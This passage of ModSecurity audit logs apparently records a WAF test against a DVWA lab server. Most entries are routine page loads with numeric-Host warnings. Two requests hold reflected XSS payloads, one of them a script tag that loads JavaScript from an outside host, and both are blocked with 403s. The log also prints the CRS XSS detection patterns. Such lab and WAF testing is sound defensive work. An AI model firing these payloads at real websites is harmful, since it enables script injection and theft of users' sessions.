\"WRcznH8AAQEAAAkYuEwAAAAD\"]"],"stopwatch":{"p1":805,"p2":1564,"p3":87,"p4":464,"p5":65,"sr":48,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:26:04 --0400","transaction_id":"WRcznH8AAQEAAAkYuE0AAAAD","remote_address":"127.0.0.1","remote_port":42004,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcznH8AAQEAAAkYuE0AAAAD\"]"],"stopwatch":{"p1":348,"p2":1326,"p3":73,"p4":405,"p5":72,"sr":16,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:26:40 --0400","transaction_id":"WRczwH8AAQEAAAkZ0BEAAAAE","remote_address":"192.168.75.145","remote_port":56768,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_d/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1603","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_d/\"] [unique_id \"WRczwH8AAQEAAAkZ0BEAAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":514,"p2":2666,"p3":111,"p4":777,"p5":97,"sr":108,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:26:40 --0400","transaction_id":"WRczwH8AAQEAAAkVV4kAAAAA","remote_address":"192.168.75.145","remote_port":56770,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_d/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1603","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_d/\"] [unique_id \"WRczwH8AAQEAAAkVV4kAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":653,"p2":2435,"p3":104,"p4":520,"p5":85,"sr":29,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:26:50 --0400","transaction_id":"WRczyn8AAQEAAAmHBJQAAAAF","remote_address":"192.168.75.145","remote_port":56772,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_d/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1419","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRczyn8AAQEAAAmHBJQAAAAF\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":722,"p2":2335,"p3":181,"p4":457,"p5":81,"sr":170,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:26:50 --0400","transaction_id":"WRczyn8AAQEAAAmHBJUAAAAF","remote_address":"192.168.75.145","remote_port":56772,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_d/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1419","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRczyn8AAQEAAAmHBJUAAAAF\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":505,"p2":2245,"p3":125,"p4":389,"p5":77,"sr":26,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:27:10 --0400","transaction_id":"WRcz3n8AAQEAAAkW4RsAAAAB","remote_address":"192.168.75.145","remote_port":56774,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/?name=%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_r/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: '';!--\\x22<XSS>=&{()}\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): XSS Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcz3n8AAQEAAAkW4RsAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: '';!--\\\\\\\\x22<XSS>=&{()}\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcz3n8AAQEAAAkW4RsAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcz3n8AAQEAAAkW4RsAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): XSS Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcz3n8AAQEAAAkW4RsAAAAB\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":693,"p2":3265,"p3":0,"p4":0,"p5":220,"sr":31,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:28:26 --0400","transaction_id":"WRc0Kn8AAQEAAAkXs@cAAAAC","remote_address":"192.168.75.145","remote_port":56776,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/?name=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fxss.rocks%2Fxss.js%3E%3C%2FSCRIPT%3E HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_r/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)([<\\xef\\xbc\\x9c]script[^>\\xef\\xbc\\x9e]*[>\\xef\\xbc\\x9e][\\\\s\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT SRC=http://xss.rocks/xss.js> found within ARGS:name: <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)<[^\\\\w<>]*(?:[^<>\\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ...\" at ARGS:name. 
